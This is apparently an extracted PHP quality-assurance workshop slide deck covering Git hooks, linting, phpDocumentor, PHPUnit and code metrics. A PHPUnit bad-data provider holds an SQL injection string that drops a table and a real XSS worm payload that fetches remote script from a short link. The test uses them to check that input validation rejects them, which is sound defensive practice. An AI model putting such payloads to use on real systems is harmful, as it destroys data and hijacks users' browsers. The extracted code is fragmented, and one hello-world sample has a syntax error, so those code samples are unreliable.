This document discusses quality assurance (QA) for PHP projects. It introduces various QA tools and techniques including syntax checking, documentation, testing, version control and code coverage. Screenshots are provided to illustrate concepts like detecting bugs early, observing behavior and preventing mistakes. The document also includes exercises for attendees to practice setting up version control with Git, running syntax checks with PHP Lint, generating documentation with phpDocumentor, and testing models with PHPUnit.
3. Michelangelo van Dam!
!
PHP Consultant
Community Leader
President of PHPBenelux
Contributor to PHP projects
!
T @DragonBe | F DragonBe
https://www.flickr.com/photos/akrabat/8784318813
4. Using Social Media?
Tag it #phpqa
http://www.flickr.com/photos/andyofne/4633356197
http://www.flickr.com/photos/andyofne/4633356197
22. Advantages of SCM
• Team development
• Multi-versions management
• Keep track of history
• Tagging milestones
• Backup of source code
• Full integration
https://www.flickr.com/photos/skoop/5397232723
23. Exercise
• Start a new project “phpqa-intro”
• Initialise it as a GIT project
• Create a “hello world” php script
• Add it to the repository & commit
24. Possible answer
$ cd workspace
$ mkdir phpqa-intro
$ cd phpqa-intro
$ git init
$(master #) echo "<?php echo 'Hello World'; . PHP_EOL" > helloworld.php
$(master #) git add helloworld.php
$(master #) git commit -m 'Initial version of helloworld'
[master (root-commit) 174c675] Initial commit of helloworld
1 file changed, 1 insertion(+)
create mode 100644 helloworld.php
$(master)
29. Exercise
• Download the pre-commit hook from http://in2.se/
phplintgit (or get it from the USB drive)
• Make sure you make it executable
• Create a syntax error in error.php and commit it
• See you get the error and ensure the file is not
committed.
30. Possible answer
$(master) git checkout -b phplint
$(phplint) wget -O .git/hooks/pre-commit http://in2.se/phplintgit
$(phplint) chmod ugo+x .git/hooks/pre-commit
$(phplint) echo "<?php echo 'Hello error' . PHP_EOL" > error.php
$(phplint) git add error.php
$(phplint +) git commit -m 'Trying to add code with errors'
Syntax errors found in file: error.php
!
Found PHP parse errors:
PHP Parse error: parse error, expecting `','' or `';'' in /Users/
dragonbe/workspace/phpqa-intro/error.php on line 2 Parse error: parse
error, expecting `','' or `';'' in /Users/dragonbe/workspace/phpqa-
intro/error.php on line 2
!
PHP parse errors found. Fix errors and commit again.
$(phplint +)
32. Why providing docblocks?
• Useful information about the
class, method or logic
• Provides hints in IDE’s
• Great reference for
• New team members
• 3rd party developers
https://www.flickr.com/photos/mundoo/2293493420
35. Exercise
• Create a class with a couple of methods (or use the
class in “exercise/MyClass.php”)
• Run phpdoc against this class
./vendor/bin/phpdoc
-‐d
exercise/phpdoc
-‐t
build/phpdoc
• See the resulting documentation files at http://
192.168.166.166/phpdoc
37. Most common excuses
why developers don’t test
• no time
• no budget
• deliver tests after finish project
(never)
• devs don’t know how
https://www.flickr.com/photos/dasprid/8147986307
50. A few remarks
• Testing against databases is “integration testing”
• Testing against databases is slow
• Testing against databases is only useful for
• triggers & stored procedures
• correct encoding and collations
61. First modify our class
<?php
namespace
PhpqaModel;
!
use
ZendInputFilterInputFilter;
use
ZendInputFilterInput;
use
ZendFilter;
use
ZendValidator;
!
class
Comment
{
/**
*
@var
InputFilter
*/
protected
$inputFilter;
/**
*
@return
InputFilter
*/
public
function
getInputFilter()
{
//
Lazy
loading
of
filter
and
validation
rules
if
(null
===
$this-‐>inputFilter)
{
}
return
$this-‐>inputFilter;
}
65. badDataProvider
/**
*
Provides
data
that
we
consider
to
be
unsafe
*
@return
array
*/
public
function
badDataProvider()
{
return
[
[
[
'commentId'
=>
0,
'fullName'
=>
'',
'emailAddress'
=>
'',
'website'
=>
'',
'comment'
=>
'',
]
],[
[
'commentId'
=>
'Little
Bobby
Tables',
'fullName'
=>
'Robert');
DROP
TABLE
`students`;
-‐-‐',
'emailAddress'
=>
'clickjack@hackers',
'website'
=>
"http://t.co/@"style="font-‐size:999999999999px;"onmouseover=
"$.getScript('http:u002fu002fis.gdu002ffl9A7')"/",
'comment'
=>
'exploit
twitter
9/21/2010',
]
],
];
}
66. our bad data test
/**
*
@dataProvider
badDataProvider
*/
public
function
testCommentIsProtectedAgainstHacks($data)
{
$comment
=
new
Comment();
$comment-‐>getInputFilter()-‐>setData($data);
$this-‐>assertFalse($comment-‐>getInputFilter()-‐>isValid());
}
67.
68. Exercise
• Add some more “badData” entries
• See if the validation rules hold
• Test one of the latest exploits
72. • CYCLO: Cyclomatic Complexity
• LOC: Lines of Code
• NOM: Number of Methods
• NOC: Number of Classes
• NOP: Number of Packages
• AHH: Average Hierarchy Height
• ANDC: Average Number of Derived Classes
• FANOUT: Number of Called Classes
• CALLS: Number of Operation Calls
pDepend info
73. • metric calculation
• execution paths
• independent control structures
• if, else, for, foreach, switch case, while, do, …
• within a single method or function
• more info
http://en.wikipedia.org/wiki/Cyclomatic_complexity
Cyclomatic Complexity
74. • The average of the maximum length from a root
class to its deepest subclass
Average Hierarchy Height
89. What?
• validates coding standards
• consistency
• readability
• set as a policy for development
• reports failures to meet the standard
• sometimes good: parentheses on wrong line
• mostly bad: line exceeds 80 characters
• but needed for terminal viewing of code
• can be set as pre-commit hook
• but can cause frustration!!!
90.
91. Exercise
• Run the following commands against “MyClass”
• pdepend
• phpmd
• phpcpd
• phpcs (php_CodeSniffer)
• What is the result?